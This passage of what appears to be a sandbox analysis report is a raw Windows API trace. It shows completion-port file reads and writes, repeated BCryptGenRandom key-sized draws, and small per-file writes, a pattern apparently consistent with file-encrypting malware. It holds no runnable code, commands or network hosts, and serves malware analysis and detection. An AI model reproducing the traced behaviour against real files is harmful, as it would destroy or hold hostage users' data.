nNumberOfBytesToRead=0x926, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.417] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.417] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.422] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x2440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0154.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0154.434] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.434] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.434] free (_Block=0x3e305b8) [0154.434] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.434] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.434] free (_Block=0x1fa91d0) [0154.434] free (_Block=0x1fa2ed8) [0154.434] free (_Block=0x1fa90b8) [0154.434] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0154.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0154.447] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.447] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.447] free (_Block=0x3e305b8) [0154.447] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.447] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.448] free (_Block=0x1fa91d0) [0154.448] free (_Block=0x1fa2ed8) [0154.448] free (_Block=0x1fa90b8) [0154.448] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.448] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0154.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0154.456] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.456] free (_Block=0x3e305b8) [0154.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.456] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.456] free (_Block=0x1fa91d0) [0154.456] free (_Block=0x1fa2ed8) [0154.456] free (_Block=0x1fa90b8) [0154.456] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0154.456] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.469] CloseHandle (hObject=0x308) returned 1 [0154.469] free (_Block=0x1ff1e60) [0154.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.478] CloseHandle (hObject=0x338) returned 1 [0154.478] free (_Block=0x3d70450) [0154.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.484] CloseHandle (hObject=0x2a8) returned 1 [0154.485] free (_Block=0x3df0008) [0154.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.488] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.493] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x21a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.508] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.566] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x78a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.581] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x80d8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.613] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xcd10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0154.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.640] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xd6bc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0154.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0154.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.670] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.670] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0154.670] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.670] free (_Block=0x3e305b8) [0154.670] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.671] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.671] free (_Block=0x1fa91d0) [0154.671] free (_Block=0x1fa2ed8) [0154.671] free (_Block=0x1fa90b8) [0154.671] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.671] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.673] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x89b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0154.673] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x42e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.218] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3e91, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0155.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0155.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0155.237] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.237] free (_Block=0x3e305b8) [0155.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.237] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.238] free (_Block=0x1fa91d0) [0155.238] free (_Block=0x1fa2ed8) [0155.238] free (_Block=0x1fa90b8) [0155.238] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.250] CloseHandle (hObject=0x2a8) returned 1 [0155.250] free (_Block=0x3df0008) [0155.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.253] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2d21, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0155.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.266] CloseHandle (hObject=0x170) returned 1 [0155.266] free (_Block=0x3d70450) [0155.266] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0155.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0155.288] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.288] free (_Block=0x3e305b8) [0155.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.289] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.289] free (_Block=0x1fa91d0) [0155.289] free (_Block=0x1fa2ed8) [0155.289] free (_Block=0x1fa90b8) [0155.289] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0155.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.297] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0155.297] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.298] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0155.298] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.298] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.298] free (_Block=0x3e305b8) [0155.298] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.298] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.299] free (_Block=0x1fa91d0) [0155.299] free (_Block=0x1fa2ed8) [0155.299] free (_Block=0x1fa90b8) [0155.299] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.301] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x9e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0155.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.307] CloseHandle (hObject=0x170) returned 1 [0155.307] free (_Block=0x3df0008) [0155.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.345] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x20e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.352] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.355] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b64, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0155.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.356] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7ab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.398] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.401] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x12a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0155.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0155.800] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17be, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.868] CloseHandle (hObject=0x308) returned 1 [0157.868] free (_Block=0x3df0008) [0157.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.884] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.896] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4f8e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0157.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0157.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.918] GetProcAddress 